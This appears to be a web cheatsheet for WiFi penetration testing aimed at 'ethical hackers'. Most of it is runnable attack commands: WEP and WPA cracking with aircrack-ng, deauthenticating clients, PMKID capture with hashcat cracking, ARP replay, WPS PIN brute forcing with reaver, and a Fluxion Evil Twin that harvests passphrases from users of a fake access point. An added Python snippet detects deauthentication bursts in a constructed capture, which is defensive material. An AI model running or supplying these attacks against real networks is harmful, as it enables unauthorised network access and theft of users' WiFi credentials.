Welcome to the ultimate WiFi penetration testing cheatsheet, an essential resource for every ethical hacker. This guide walks you through testing WEP, WPA, the PMKID attack, the ARP request replay attack, WPS PIN attacks, the HITRE attack, and the Evil Twin method. We’ll also introduce popular automated tools and provide useful links for further learning.
This cheatsheet assumes that you have installed the Kali Linux operating system and are competent with Linux-based tools. You will also need a WiFi adapter capable of packet injection.
Here are some common network adapters that are capable of packet injection:
- Alfa AWUS036ACH
- TP-Link TL-WN722N
- Alfa AWUS036NHA
- Alfa AWUS036H
- NETGEAR A6210-100PES
WiFi Penetration Testing Overview
WiFi penetration testing is a critical component of network security, aiming to identify vulnerabilities in wireless networks and implement appropriate security measures. Our WiFi penetration testing cheatsheet covers various techniques and methodologies targeting WEP, WPA, WPA2, and WPA3 encryption standards.
Essential Tools for WiFi Penetration Testing
Here are some popular automated tools for WiFi penetration testing:
- Aircrack-ng Suite: https://www.aircrack-ng.org/
- Wireshark: https://www.wireshark.org/
- Reaver: https://github.com/t6x/reaver-wps-fork-t6x
- Wifite: https://github.com/derv82/wifite2
- Fluxion: https://github.com/FluxionNetwork/fluxion
- Fern WiFi Cracker: https://github.com/savio-code/fern-wifi-cracker
🔐 WEP Penetration Testing
Enable Monitor Mode
airmon-ng start wlan0
Capture Packets
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
Crack WEP Key
aircrack-ng [OUTPUT]-01.cap
→ airodump-ng appends -01 to the prefix given with --write, so the capture file is [OUTPUT]-01.cap.
🔐 WPA Penetration Testing
Enable Monitor Mode
airmon-ng start wlan0
Capture WPA Handshake
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
Deauthenticate a Client
aireplay-ng --deauth 5 -a [BSSID] -c [CLIENT] wlan0mon
Crack WPA Key
aircrack-ng [OUTPUT]-01.cap -w [WORDLIST]
🔐 PMKID Attack
Enable Monitor Mode
airmon-ng start wlan0
Capture PMKID
hcxdumptool -i wlan0mon --enable_status 3 --filterlist=[TARGETS] --filtermode=2 --outfile=[OUTPUT]
Convert to Hashcat Format
hcxpcaptool -z [HASHFILE] [OUTPUT]
Crack PMKID
hashcat -m 16800 [HASHFILE] [WORDLIST] --force
🔐 ARP Request Replay Attack
Enable Monitor Mode
airmon-ng start wlan0
Capture Packets
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
Perform ARP Request Replay
aireplay-ng --arpreplay -b [BSSID] -h [CLIENT] wlan0mon
Crack WEP Key
aircrack-ng [OUTPUT]-01.cap
🔐 WPS PIN Attack
Enable Monitor Mode
airmon-ng start wlan0
Scan for WPS-enabled Networks
wash -i wlan0mon
Crack WPS PIN Using Reaver
reaver -i wlan0mon -b [BSSID] -c [CHANNEL] -vv -K 1
→ If the WPS PIN is recovered, reaver also prints the WPA passphrase. Many current access points lock WPS after a few failed PIN attempts, and disabling WPS removes this attack surface entirely.
🔐 HITRE Attack (Handshake, Interactive, and Timing Resource Exhaustion)
Enable Monitor Mode
airmon-ng start wlan0
Capture WPA Handshake
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
Repeatedly Deauthenticate Clients
aireplay-ng --deauth [COUNT] -a [BSSID] wlan0mon
Crack WPA Key
aircrack-ng [OUTPUT]-01.cap -w [WORDLIST]
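The deauthentication steps used above (both in the WPA handshake capture and in this section) send bursts of spoofed 802.11 deauthentication frames, which is exactly what a wireless IDS looks for. The following added example is not part of the original cheatsheet: it is a minimal parser for a raw-802.11 pcap (DLT 105, no radiotap header) that counts deauth/disassoc frames per transmitter in a sliding time window and flags bursts. The sample capture, MAC addresses, window size and threshold are constructed values.

```python
import struct
from collections import defaultdict

LINKTYPE_IEEE802_11 = 105          # raw 802.11 frames, no radiotap header (DLT 105)
DEAUTH, DISASSOC = 0x0C, 0x0A      # 802.11 management frame subtypes

def mgmt_frame(subtype, receiver, transmitter, bssid, reason=7):
    # Minimal 802.11 management frame: FC, duration, addr1..3, seq ctrl, reason code (constructed sample)
    fc = bytes([subtype << 4, 0x00])            # type 0 = management, given subtype, no flags
    return fc + b"\x00\x00" + receiver + transmitter + bssid + b"\x00\x00" + struct.pack("<H", reason)

def build_pcap(records):
    # Wrap (timestamp_us, frame) pairs in a classic little-endian pcap (constructed sample capture)
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for ts, frame in records:
        out += struct.pack("<IIII", ts // 1_000_000, ts % 1_000_000, len(frame), len(frame)) + frame
    return out

def deauth_bursts(pcap, window_us=1_000_000, threshold=5):
    """Return {transmitter MAC: peak count} for senders with >= threshold deauth/disassoc frames in any window."""
    if pcap[:4] != b"\xd4\xc3\xb2\xa1" or struct.unpack("<I", pcap[20:24])[0] != LINKTYPE_IEEE802_11:
        raise ValueError("expected a little-endian microsecond pcap with raw 802.11 frames (DLT 105)")
    seen, off = defaultdict(list), 24            # transmitter MAC -> timestamps of deauth/disassoc frames
    while off + 16 <= len(pcap):
        ts_s, ts_us, incl, _ = struct.unpack("<IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 24:                      # truncated frame: skip rather than misparse
            continue
        ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
        if ftype == 0 and subtype in (DEAUTH, DISASSOC):
            src = ":".join(f"{b:02x}" for b in frame[10:16])   # addr2 = transmitter address
            seen[src].append(ts_s * 1_000_000 + ts_us)
    bursts = {}
    for src, times in seen.items():
        times.sort()
        start = peak = 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[start] > window_us:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            bursts[src] = peak
    return bursts

# Constructed sample: one AP sends 8 deauths to a client within 200 ms; another AP sends a single disassoc.
AP, CLIENT, OTHER_AP = (bytes.fromhex(h) for h in ("001122334455", "66778899aabb", "aabbccddeeff"))
SAMPLE = build_pcap([(i * 25_000, mgmt_frame(DEAUTH, CLIENT, AP, AP)) for i in range(8)]
                    + [(5_000_000, mgmt_frame(DISASSOC, CLIENT, OTHER_AP, OTHER_AP))])
```

Running `deauth_bursts(SAMPLE)` on the constructed capture flags only the first AP with a peak of 8 frames; real captures from airodump-ng contain a radiotap header, so the frame offset must be adjusted by the header length before reusing this parser.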
🔐 Evil Twin Attack (Fluxion)
Install Fluxion
git clone https://github.com/FluxionNetwork/fluxion
Run Fluxion
cd fluxion && ./fluxion.sh
Configure Evil Twin
- Select your language
- Choose “Evil Twin AP” attack
- Follow the instructions to set up a fake access point
Capture WPA Passphrase
Once a client connects to the fake access point and enters the passphrase, Fluxion captures and displays it.